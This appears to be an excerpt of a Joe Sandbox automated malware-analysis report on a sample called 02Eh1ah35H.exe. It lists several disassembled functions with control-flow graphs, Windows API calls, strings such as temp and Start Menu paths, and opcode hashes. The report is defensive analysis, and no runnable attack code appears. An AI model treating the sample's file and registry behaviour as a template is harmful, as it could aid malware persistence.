                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                • API String ID: 3449924974-26219170
                                                                                                                                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                • Instruction ID: 4c6d3c4ce34384c56ae6b54862a6db5cebbf8231f9905efb0a53c4272bf1951e
                                                                                                                                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                                                                                • Instruction Fuzzy Hash: E1011AB1C00219EADF009FA5DD44BEFBBB8EF04314F00803AD544B6190E7789648CFA9
                                                                                                                                                                                Function 00406773 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 869 406773-406793 GetSystemDirectoryW 870 406795 869->870 871 406797-406799 869->871 870->871 872 4067aa-4067ac 871->872 873 40679b-4067a4 871->873 875 4067ad-4067e0 wsprintfW LoadLibraryExW 872->875 873->872 874 4067a6-4067a8 873->874 874->875
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                                                                                                                • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                • Instruction ID: 038d7fed81a94acb9f8d17f6b302bf2205b26bc145b48260013954e6d266918a
                                                                                                                                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                • Instruction Fuzzy Hash: 65F0F670510119A7CF14AB64DD0DF9B376CAB40309F10047AA646F20D0EB7C9A68CBA8
                                                                                                                                                                                Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 876 40324c-403263 877 403265 876->877 878 40326c-403275 876->878 877->878 879 403277 878->879 880 40327e-403283 878->880 879->880 881 403293-4032a0 call 403444 880->881 882 403285-40328e call 40345a 880->882 886 403432 881->886 887 4032a6-4032aa 881->887 882->881 888 403434-403435 886->888 889 4032b0-4032d6 GetTickCount 887->889 890 4033dd-4033df 887->890 893 40343d-403441 888->893 894 40343a 889->894 895 4032dc-4032e4 889->895 891 4033e1-4033e4 890->891 892 40341f-403422 890->892 891->894 898 4033e6 891->898 896 403424 892->896 897 403427-403430 call 403444 892->897 894->893 899 4032e6 895->899 900 4032e9-4032f7 call 403444 895->900 896->897 897->886 908 403437 897->908 902 4033e9-4033ef 898->902 899->900 900->886 910 4032fd-403306 900->910 905 4033f1 902->905 906 4033f3-403401 call 403444 902->906 905->906 906->886 913 403403-40340f call 405f96 906->913 908->894 912 40330c-40332c call 40693e 910->912 917 403332-403345 GetTickCount 912->917 918 4033d5-4033d7 912->918 922 403411-40341b 913->922 923 4033d9-4033db 913->923 920 403390-403392 917->920 921 403347-40334f 917->921 918->888 927 403394-403398 920->927 928 4033c9-4033cd 920->928 925 403351-403355 921->925 926 403357-403388 MulDiv wsprintfW call 405456 921->926 922->902 924 40341d 922->924 923->888 924->894 925->920 925->926 933 40338d 926->933 931 40339a-4033a1 call 405f96 927->931 932 4033af-4033ba 927->932 928->895 929 4033d3 928->929 929->894 936 4033a6-4033a8 931->936 935 4033bd-4033c1 932->935 933->920 935->912 937 4033c7 935->937 936->923 938 4033aa-4033ad 936->938 937->894 938->935
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                                                • API String ID: 551687249-2449383134
                                                                                                                                                                                • Opcode ID: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                                                                                                                                • Instruction ID: 008436f450556a42ebae23d461066e9f0811e1f15f23a2ec19415b9062137ceb
                                                                                                                                                                                • Opcode Fuzzy Hash: 93e44d2671c096b7225e0ed32f8acedc4fb2cb11057b9db1c10a95020cbffac7
                                                                                                                                                                                • Instruction Fuzzy Hash: 86516C71900219DBDB11DF65DA84B9F7FB8AF0076AF14417BE814B72C1C7789A40CBAA
                                                                                                                                                                                Function 00405F13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 939 405f13-405f1f 940 405f20-405f54 GetTickCount GetTempFileNameW 939->940 941 405f63-405f65 940->941 942 405f56-405f58 940->942 944 405f5d-405f60 941->944 942->940 943 405f5a 942->943 943->944
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405F31
                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\02Eh1ah35H.exe",004034A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC), ref: 00405F4C
                                                                                                                                                                                Strings
                                                                                                                                                                                • nsa, xrefs: 00405F20
                                                                                                                                                                                • "C:\Users\user\Desktop\02Eh1ah35H.exe", xrefs: 00405F13
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F18
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                • String ID: "C:\Users\user\Desktop\02Eh1ah35H.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                • API String ID: 1716503409-119190685
                                                                                                                                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                • Instruction ID: 2ec416300cd5d099b763d3688cd3c506487cb406e2025687db32897a35dea38d
                                                                                                                                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                • Instruction Fuzzy Hash: 84F09676B00204BBDB008F55ED05E9FB7ACEB95750F10803AEA04F7140E6B499548B58
                                                                                                                                                                                Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 945 402e41-402e6a call 40625b 947 402e6f-402e73 945->947 948 402f24-402f28 947->948 949 402e79-402e7d 947->949 950 402ea2-402eb5 949->950 951 402e7f-402ea0 RegEnumValueW 949->951 953 402ede-402ee5 RegEnumKeyW 950->953 951->950 952 402f09-402f17 RegCloseKey 951->952 952->948 954 402eb7-402eb9 953->954 955 402ee7-402ef9 RegCloseKey call 4067e3 953->955 954->952 956 402ebb-402ecf call 402e41 954->956 960 402f19-402f1f 955->960 961 402efb-402f07 RegDeleteKeyW 955->961 956->955 963 402ed1-402edd 956->963 960->948 961->948 963->953
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                                                • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                                                                                                                                • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                                                                                                                                                                • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                                                                                                                                • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8
                                                                                                                                                                                Function 6FDF1777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 964 6fdf1777-6fdf17b6 call 6fdf1b5f 968 6fdf17bc-6fdf17c0 964->968 969 6fdf18d6-6fdf18d8 964->969 970 6fdf17c9-6fdf17d6 call 6fdf23e0 968->970 971 6fdf17c2-6fdf17c8 call 6fdf239e 968->971 976 6fdf17d8-6fdf17dd 970->976 977 6fdf1806-6fdf180d 970->977 971->970 980 6fdf17df-6fdf17e0 976->980 981 6fdf17f8-6fdf17fb 976->981 978 6fdf180f-6fdf182b call 6fdf25b5 call 6fdf15b4 call 6fdf1272 GlobalFree 977->978 979 6fdf182d-6fdf1831 977->979 1004 6fdf1885-6fdf1889 978->1004 986 6fdf187e-6fdf1884 call 6fdf25b5 979->986 987 6fdf1833-6fdf187c call 6fdf15c6 call 6fdf25b5 979->987 984 6fdf17e8-6fdf17e9 call 6fdf2af8 980->984 985 6fdf17e2-6fdf17e3 980->985 981->977 982 6fdf17fd-6fdf17fe call 6fdf2d83 981->982 996 6fdf1803 982->996 999 6fdf17ee 984->999 992 6fdf17e5-6fdf17e6 985->992 993 6fdf17f0-6fdf17f6 call 6fdf2770 985->993 986->1004 987->1004 992->977 992->984 1003 6fdf1805 993->1003 996->1003 999->996 1003->977 1007 6fdf188b-6fdf1899 call 6fdf2578 1004->1007 1008 6fdf18c6-6fdf18cd 1004->1008 1014 6fdf189b-6fdf189e 1007->1014 1015 6fdf18b1-6fdf18b8 1007->1015 1008->969 1010 6fdf18cf-6fdf18d0 GlobalFree 1008->1010 1010->969 1014->1015 1016 6fdf18a0-6fdf18a8 1014->1016 1015->1008 1017 6fdf18ba-6fdf18c5 call 6fdf153d 1015->1017 1016->1015 1019 6fdf18aa-6fdf18ab FreeLibrary 1016->1019 1017->1008 1019->1015
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DD4
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DD9
                                                                                                                                                                                  • Part of subcall function 6FDF1B5F: GlobalFree.KERNEL32(?), ref: 6FDF1DDE
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF1825
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 6FDF18AB
                                                                                                                                                                                • GlobalFree.KERNELBASE(00000000), ref: 6FDF18D0
                                                                                                                                                                                  • Part of subcall function 6FDF239E: GlobalAlloc.KERNEL32(00000040,?), ref: 6FDF23CF
                                                                                                                                                                                  • Part of subcall function 6FDF2770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FDF17F6,00000000), ref: 6FDF2840
                                                                                                                                                                                  • Part of subcall function 6FDF15C6: wsprintfW.USER32 ref: 6FDF15F4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                                                                                • Opcode ID: 44c79d5f6a5953175fcf99d6156ad97cfadd61064aa6859de827fbea7f268dc2
                                                                                                                                                                                • Instruction ID: e902de0ecbccda64105958fdeccf7782c69ebed2308a8ea05f2b344fc4a27fbb
                                                                                                                                                                                • Opcode Fuzzy Hash: 44c79d5f6a5953175fcf99d6156ad97cfadd61064aa6859de827fbea7f268dc2
                                                                                                                                                                                • Instruction Fuzzy Hash: 8041E1F1402345EADF819F74EA84FC537A8BF06329F0A4166E9199E1C6DB74B08687B0
                                                                                                                                                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                  • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                                                                                                                                • API String ID: 1892508949-3207577588
                                                                                                                                                                                • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                                                                                                                                • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                                                                                                                                                                • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                                                                                                                                • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                                                                                                                                                                Function 004020D0 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
